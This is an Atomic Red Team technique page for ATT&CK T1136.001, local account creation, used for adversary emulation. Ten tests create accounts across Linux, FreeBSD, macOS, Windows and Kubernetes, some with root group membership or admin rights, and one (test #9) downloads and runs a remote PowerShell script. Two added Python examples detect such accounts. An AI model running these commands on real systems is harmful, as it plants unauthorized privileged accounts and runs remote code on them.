T1136.001
Create Account: Local Account
Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.
For example, with a sufficient level of access, the Windows net user /add command can be used to create a local account. In Linux, the useradd command can be used, while on macOS systems, the dscl -create command can be used. Local accounts may also be added to network devices, often via common Network Device CLI commands such as username, to ESXi servers via esxcli system account add, or to Kubernetes clusters using the kubectl utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)
Adversaries may also create new local accounts on network firewall management consoles – for example, by exploiting a vulnerable firewall management system, threat actors may be able to establish super-admin accounts that could be used to modify firewall rules and gain further access to the network.(Citation: Cyber Security News)
Such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.
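One defensive check for the Linux/FreeBSD variants described above is to diff /etc/passwd against a known-good baseline and flag new entries with the traits a backdoor account tends to have (UID or GID 0, a home directory under /root, a system-range UID with an interactive shell). This is an added example, not Atomic Red Team code; both passwd snapshots are constructed and the 999 system-UID ceiling is an assumption matching common distro defaults.

```python
# Added example (not Atomic Red Team code): diff /etc/passwd against a known-good
# baseline and flag new accounts with the traits the tests on this page produce.
from __future__ import annotations
from typing import NamedTuple

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}
PasswdEntry = NamedTuple("PasswdEntry", [("name", str), ("uid", int), ("gid", int), ("home", str), ("shell", str)])

def parse_passwd(text: str) -> dict[str, PasswdEntry]:
    """Parse passwd(5) lines; malformed lines are skipped rather than crashing."""
    entries = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _pw, uid, gid, _gecos, home, shell = fields
        entries[name] = PasswdEntry(name, int(uid), int(gid), home, shell)
    return entries

def audit_entry(e: PasswdEntry, sys_uid_max: int = 999) -> list[str]:
    """Traits that make a non-root entry look like a backdoor account (assumed UID ceiling 999)."""
    if e.name == "root":
        return []
    findings = []
    if e.uid == 0:
        findings.append("uid 0")
    if e.gid == 0:                                              # useradd -g 0 / pw useradd -g 0
        findings.append("gid 0 (root group)")
    if e.home == "/root" or e.home.startswith("/root/"):        # useradd -d /root
        findings.append("home under /root")
    if e.uid <= sys_uid_max and e.shell not in NOLOGIN_SHELLS:  # useradd -r -s /bin/bash
        findings.append(f"system-range uid with login shell {e.shell}")
    return findings

def find_new_accounts(baseline: str, current: str) -> dict[str, list[str]]:
    """Accounts present now but absent from the baseline, each with its findings."""
    base = parse_passwd(baseline)
    return {n: audit_entry(e) for n, e in parse_passwd(current).items() if n not in base}

# Constructed snapshots: BASELINE is the known-good state, CURRENT was taken later.
BASELINE = "root:x:0:0:root:/root:/bin/bash\n" \
           "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n" \
           "alice:x:1000:1000:Alice:/home/alice:/bin/bash\n"
CURRENT = BASELINE + "butter:x:1001:0::/root:/bin/bash\n" \
                     "evil_user:x:998:100:evil_account:/home/evil_user:/bin/bash\n"

for name, why in find_new_accounts(BASELINE, CURRENT).items():
    print(f"new account {name}: {', '.join(why) or 'no red flags'}")
```

On a live host, read the baseline from a snapshot you stored earlier and the current text from /etc/passwd; accounts with no findings are still worth reviewing, since the diff itself is the primary signal.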
Atomic Tests
- Atomic Test #1 - Create a user account on a Linux system
- Atomic Test #2 - Create a user account on a FreeBSD system
- Atomic Test #3 - Create a user account on a MacOS system
- Atomic Test #4 - Create a new user in a command prompt
- Atomic Test #5 - Create a new user in PowerShell
- Atomic Test #6 - Create a new user in Linux with root UID and GID.
- Atomic Test #7 - Create a new user in FreeBSD with root GID.
- Atomic Test #8 - Create a new Windows admin user
- Atomic Test #9 - Create a new Windows admin user via .NET
- Atomic Test #10 - Create a Linux user via kubectl in a Pod
Atomic Test #1 - Create a user account on a Linux system
Create a user via useradd
Supported Platforms: Linux
auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | evil_user |
Attack Commands: Run with bash! Elevation Required (e.g. root or admin)
```bash
useradd -M -N -r -s /bin/bash -c evil_account #{username}
```
Cleanup Commands:
```bash
userdel #{username}
```
Atomic Test #2 - Create a user account on a FreeBSD system
Create a user via pw
Supported Platforms: Linux
auto_generated_guid: a39ee1bc-b8c1-4331-8e5f-1859eb408518
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | evil_user |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
```sh
pw useradd #{username} -s /usr/sbin/nologin -d /nonexistent -c evil_account
```
Cleanup Commands:
```sh
rmuser -y #{username}
```
Atomic Test #3 - Create a user account on a MacOS system
Creates a user on a MacOS system with dscl
Supported Platforms: macOS
auto_generated_guid: 01993ba5-1da3-4e15-a719-b690d4f0f0b2
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | evil_user |
| realname | 'realname' to record when creating the user | string | Evil Account |
Attack Commands: Run with bash! Elevation Required (e.g. root or admin)
```bash
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/zsh
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
```
Cleanup Commands:
```bash
dscl . -delete /Users/#{username}
```
Atomic Test #4 - Create a new user in a command prompt
Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_CMD"
Supported Platforms: Windows
auto_generated_guid: 6657864e-0323-4206-9344-ac9cd7265a4f
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | T1136.001_CMD |
| password | Password of the user to create | string | T1136.001_CMD! |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
```cmd
net user /add "#{username}" "#{password}"
```
Cleanup Commands:
```cmd
net user /del "#{username}" >nul 2>&1
```
Atomic Test #5 - Create a new user in PowerShell
Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_PowerShell"
Supported Platforms: Windows
auto_generated_guid: bc8be0ac-475c-4fbf-9b1d-9fffd77afbde
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | T1136.001_PowerShell |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
```powershell
New-LocalUser -Name "#{username}" -NoPassword
```
Cleanup Commands:
```powershell
Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
```
Atomic Test #6 - Create a new user in Linux with root UID and GID.
Creates a new user in Linux and adds the user to the root group. This technique was used by adversaries during the Butter attack campaign.
Supported Platforms: Linux
auto_generated_guid: a1040a30-d28b-4eda-bd99-bb2861a4616c
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | butter |
| password | Password of the user to create | string | BetterWithButter |
Attack Commands: Run with bash! Elevation Required (e.g. root or admin)
```bash
useradd -g 0 -M -d /root -s /bin/bash #{username}
if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi;
```
Cleanup Commands:
```bash
userdel #{username}
```
Atomic Test #7 - Create a new user in FreeBSD with root GID.
Creates a new user in FreeBSD and adds the user to the root group. This technique was used by adversaries during the Butter attack campaign.
Supported Platforms: Linux
auto_generated_guid: d141afeb-d2bc-4934-8dd5-b7dba0f9f67a
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | butter |
| password | Password of the user to create | string | BetterWithButter |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
```sh
pw useradd #{username} -g 0 -d /root -s /bin/sh
echo "#{password}" | pw usermod #{username} -h 0
```
Cleanup Commands:
```sh
pw userdel #{username}
```
Atomic Test #8 - Create a new Windows admin user
Creates a new admin user in a command prompt.
Supported Platforms: Windows
auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | T1136.001_Admin |
| password | Password of the user to create | string | T1136_pass |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
```cmd
net user /add "#{username}" "#{password}"
net localgroup administrators "#{username}" /add
```
Cleanup Commands:
```cmd
net user /del "#{username}" >nul 2>&1
```
Atomic Test #9 - Create a new Windows admin user via .NET
Creates a new admin user in a powershell session without using net.exe
Supported Platforms: Windows
auto_generated_guid: 2170d9b5-bacd-4819-a952-da76dae0815f
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')
```
Atomic Test #10 - Create a Linux user via kubectl in a Pod
Launches a short-lived Alpine pod and creates a Linux user inside the pod. The pod is automatically deleted after execution.
Supported Platforms: Containers
auto_generated_guid: d9efa6c7-6518-42b2-809a-4f2a8e242b9b
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| pod_name | K8s pod_name to execute the command in | string | atomic-linux-useradd |
| username | Username of the user to create inside the pod | string | evil_user |
| image_name | Name of the docker image | string | alpine |
Attack Commands: Run with bash!
```bash
kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- sh -lc 'adduser -D #{username} && id #{username}'
```
Dependencies: Run with bash!
Description: kubectl must be installed and configured
Check Prereq Commands:
```bash
which kubectl
```
Get Prereq Commands:
```bash
echo "kubectl must be installed manually"
```
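The Windows admin-user tests above (#8 and #9) create an account and then put it in the local Administrators group, which the Security log records as event 4720 (user account created) followed by 4732 (member added to a security-enabled local group). The correlation below is an added example, not Atomic Red Team code; the event records are constructed and carry only a subset of the EventData fields of those two events, matched on the new account's SID rather than its name so a rename between the two events does not break the link.

```python
# Added example (not Atomic Red Team code): correlate Windows Security events 4720
# (user account created) and 4732 (member added to a local group) to alert when an
# account becomes a local administrator within minutes of being created.
# Records are constructed and carry a subset of the real EventData fields.
from __future__ import annotations
from datetime import datetime, timedelta

ADMINISTRATORS_SID = "S-1-5-32-544"   # well-known SID of BUILTIN\Administrators

def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")

def new_local_admins(events: list[dict], window: timedelta = timedelta(minutes=10)) -> list[dict]:
    """One alert per account that is created (4720) and then added to Administrators
    (4732) within `window`; membership is matched on the new account's SID."""
    created = {}   # TargetSid of the new account -> its 4720 event
    alerts = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):   # ISO timestamps sort as text
        if ev["EventID"] == 4720:
            created[ev["TargetSid"]] = ev
        elif ev["EventID"] == 4732 and ev["TargetSid"] == ADMINISTRATORS_SID:
            src = created.get(ev["MemberSid"])
            if src is None:
                continue   # admin added, but not an account we saw being created
            delta = parse_ts(ev["TimeCreated"]) - parse_ts(src["TimeCreated"])
            if delta <= window:
                alerts.append({"user": src["TargetUserName"], "by": ev["SubjectUserName"],
                               "seconds": int(delta.total_seconds())})
    return alerts

EVENTS = [  # constructed sample: one rapid create-then-elevate, one slow legitimate-looking pair
    {"EventID": 4720, "TimeCreated": "2024-05-01T09:00:00", "SubjectUserName": "admin",
     "TargetUserName": "T1136.001_Admin", "TargetSid": "S-1-5-21-1-2-3-1105"},
    {"EventID": 4732, "TimeCreated": "2024-05-01T09:00:02", "SubjectUserName": "admin",
     "MemberSid": "S-1-5-21-1-2-3-1105", "TargetUserName": "Administrators",
     "TargetSid": ADMINISTRATORS_SID},
    {"EventID": 4720, "TimeCreated": "2024-05-01T10:00:00", "SubjectUserName": "helpdesk",
     "TargetUserName": "svc_backup", "TargetSid": "S-1-5-21-1-2-3-1106"},
    {"EventID": 4732, "TimeCreated": "2024-05-01T11:30:00", "SubjectUserName": "helpdesk",
     "MemberSid": "S-1-5-21-1-2-3-1106", "TargetUserName": "Administrators",
     "TargetSid": ADMINISTRATORS_SID},
]

if __name__ == "__main__":
    for a in new_local_admins(EVENTS):
        print(f"{a['user']} made local admin by {a['by']} {a['seconds']}s after creation")
```

The ten-minute window is a tuning choice; the .NET variant (test #9) avoids net.exe but still produces the same 4720/4732 pair, so this correlation is independent of the tool used.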